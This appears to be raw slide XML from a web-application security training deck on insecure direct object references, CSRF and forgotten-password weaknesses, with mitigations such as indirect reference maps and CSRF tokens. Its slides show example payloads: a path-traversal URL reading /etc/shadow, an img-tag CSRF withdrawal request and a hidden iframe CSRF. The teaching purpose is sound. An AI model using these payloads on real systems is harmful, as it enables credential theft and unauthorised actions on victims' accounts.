            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="81073" y="263886"/>
              <a:ext cx="10169685" cy="11330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l" defTabSz="914400">
                <a:defRPr sz="2400" u="sng">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                  <a:hlinkClick r:id="rId3" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr>
                <a:defRPr u="none"/>
              </a:pPr>
              <a:r>
                <a:rPr u="sng">
                  <a:hlinkClick r:id="rId3" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
                </a:rPr>
                <a:t>http://misc-security.com/file.jsp?file=report.txt</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1856" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1115741" y="4404074"/>
            <a:ext cx="10250758" cy="1660816"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="10250757" cy="1660814"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1854" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="10198059" cy="1660815"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 117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855" name="http://misc-security.com/file.jsp?file=**../../../etc/shadow**"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="81073" y="263886"/>
              <a:ext cx="10169685" cy="11330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l" defTabSz="914400">
                <a:defRPr sz="2400" u="sng">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                  <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr>
                <a:defRPr u="none"/>
              </a:pPr>
              <a:r>
                <a:rPr u="sng">
                  <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
                </a:rPr>
                <a:t>http://misc-security.com/file.jsp?file=**../../../etc/shadow**</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide2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0" name="when a web application exposes an internal implementation object to the user. Some examples of internal implementation objects are database records, URLs, or files."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>when a web application exposes an internal implementation object to the user. Some examples of internal implementation objects are database records, URLs, or files.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide2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2" name="use indirect reference maps.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>use indirect reference maps.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Use per user or session indirect object references. This prevents attackers from directly targeting unauthorized resources. For example, instead of using the resource’s database key, a drop down list of six resources authorized for the current user could use the numbers 1 to 6 to indicate which value the user selected. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Check access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide2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4" name="A5 : Cross Site Request Forgery (CSRF)"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523804" y="4231077"/>
            <a:ext cx="11704321" cy="2144888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>A5 : Cross Site Request Forgery (CSRF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18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7" name="This attack is also known as a blind attack and One Click Attack"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>This attack is also known as a blind attack and One Click Attack</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0" name="Forgotten Password Functionality"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="914400">
              <a:defRPr sz="5400">
                <a:latin typeface="Constantia"/>
                <a:ea typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:sym typeface="Constantia"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Forgotten Password Functionality</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="701" name="Design weaknesses in forgotten password functions frequently make this the weakest link at which to attack the application’s overall authentication logic.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="952500" y="3044201"/>
            <a:ext cx="11099800" cy="6286501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="330281" indent="-330281" defTabSz="786384">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="AA2B1E"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
              <a:buFont typeface="Brush Script MT"/>
              <a:buChar char="O"/>
              <a:defRPr sz="2408">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:ea typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:sym typeface="Franklin Gothic Book"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Design weaknesses in forgotten password functions frequently make this the weakest link at which to attack the application’s overall authentication logic. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="297321" indent="-297321" defTabSz="786384">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2408">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:ea typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:sym typeface="Franklin Gothic Book"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr marL="297321" indent="-297321" defTabSz="786384">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2408">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:ea typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:sym typeface="Franklin Gothic Book"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr marL="297321" indent="-297321" defTabSz="786384">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2408">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:ea typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:sym typeface="Franklin Gothic Book"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr marL="297321" indent="-297321" defTabSz="786384">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2408">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:ea typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:sym typeface="Franklin Gothic Book"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr marL="297321" indent="-297321" defTabSz="786384">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2408">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:ea typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:sym typeface="Franklin Gothic Book"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr marL="297321" indent="-297321" defTabSz="786384">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2408">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:ea typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:sym typeface="Franklin Gothic Book"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr marL="297321" indent="-297321" defTabSz="786384">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2408">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:ea typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:sym typeface="Franklin Gothic Book"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr marL="297321" indent="-297321" defTabSz="786384">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2408">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:ea typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:sym typeface="Franklin Gothic Book"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr marL="330281" indent="-330281" defTabSz="786384">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="AA2B1E"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
              <a:buFont typeface="Brush Script MT"/>
              <a:buChar char="O"/>
              <a:defRPr sz="2408">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:ea typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:sym typeface="Franklin Gothic Book"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Often involves secondary challenge such as questions about mothers’ maiden names, memorable dates, favorite colors, and the like will generally have a much smaller set of potential answers than the set of possible passwords.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="297321" indent="-297321" defTabSz="786384">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2408">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:ea typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:sym typeface="Franklin Gothic Book"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr marL="334213" indent="-334213" defTabSz="786384">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="AA2B1E"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
              <a:buFont typeface="Brush Script MT"/>
              <a:buChar char="O"/>
              <a:defRPr sz="2924">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:ea typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:sym typeface="Franklin Gothic Book"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>“Do I own a boat?”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="702" name="image8.png" descr="image8.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3359161" y="4277426"/>
            <a:ext cx="5330959" cy="2834463"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="127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2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69" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="1178186"/>
            <a:ext cx="13004801" cy="7397228"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide2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1" name="occurs when a malicious Web site, email, blog, instant message, or program causes a user’s Web browser to perform an unwanted action on a trusted site for which the user is currently authenticated"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>occurs when a malicious Web site, email, blog, instant message, or program causes a user’s Web browser to perform an unwanted action on a trusted site for which the user is currently authenticated</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18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4" name="Body"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="2275840"/>
            <a:ext cx="11704322" cy="6436926"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1875" name="https://devnet.kentico.com/getattachment/Articles/2015-03/Protection-against-Cross-site-request-forgery-%28CSR/CSRF_UX_general_Flip.png" descr="https://devnet.kentico.com/getattachment/Articles/2015-03/Protection-against-Cross-site-request-forgery-%28CSR/CSRF_UX_general_Flip.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2384213" y="1869439"/>
            <a:ext cx="8683414" cy="6014722"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide2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7" name="Spring provides support for generation and validation of tokens mitigating CSRF attacks"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="2275840"/>
            <a:ext cx="11704322" cy="6436926"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Spring provides support for generation and validation of tokens mitigating CSRF attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide2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9" name="IMG Injection (embedded CSRF)"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="390596"/>
            <a:ext cx="11704322" cy="1625601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>IMG Injection (embedded CSRF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1882" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1115741" y="2271884"/>
            <a:ext cx="10250758" cy="1660815"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="10250757" cy="1660814"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1880" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="10198059" cy="1660815"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 117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881" name="&lt;img src=&quot;http://bank.example.com/withdraw?account=bob&amp;amount=1000000&amp;for=Fred&quot;&gt;"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="81073" y="263886"/>
              <a:ext cx="10169685" cy="11330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l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>&lt;img src="http://bank.example.com/withdraw?account=bob&amp;amount=1000000&amp;for=Fred"&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide2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6" name="IMG Injection (embedded CSRF)"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="390596"/>
            <a:ext cx="11704322" cy="1625601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>IMG Injection (embedded CSRF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1889" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1115741" y="2271884"/>
            <a:ext cx="10250758" cy="6113997"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="10250757" cy="6113996"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1887" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="10198059" cy="1660815"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 117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888" name="&lt;script src=“...&quot;&gt;&lt;/script&gt;…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="81073" y="263886"/>
              <a:ext cx="10169685" cy="58501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l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>&lt;script src=“..."&gt;&lt;/script&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>&lt;link rel="stylesheet" href=“..."&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>&lt;img&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>&lt;video&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>&lt;audio&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t> &lt;object&gt;, &lt;embed&gt; , &lt;applet&gt; </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
            <a:p>
              <a:pPr algn="l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t> &lt;frame&gt;,&lt;iframe&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide2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94" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2745457" y="1977813"/>
            <a:ext cx="7513886" cy="5797974"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1897" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1377021" y="7867002"/>
            <a:ext cx="10250758" cy="1660816"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="10250757" cy="1660814"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1895" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="10198059" cy="1660815"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 117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896" name="&lt;iframe src=&quot;http://www.vulnweb.com/updateif.php&quot; style=&quot;display:none&quot;&gt;&lt;/iframe&gt;"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="81073" y="263886"/>
              <a:ext cx="10169685" cy="11330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l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>&lt;iframe src="http://www.vulnweb.com/updateif.php" style="display:none"&gt;&lt;/iframe&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1898" name="Examples"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
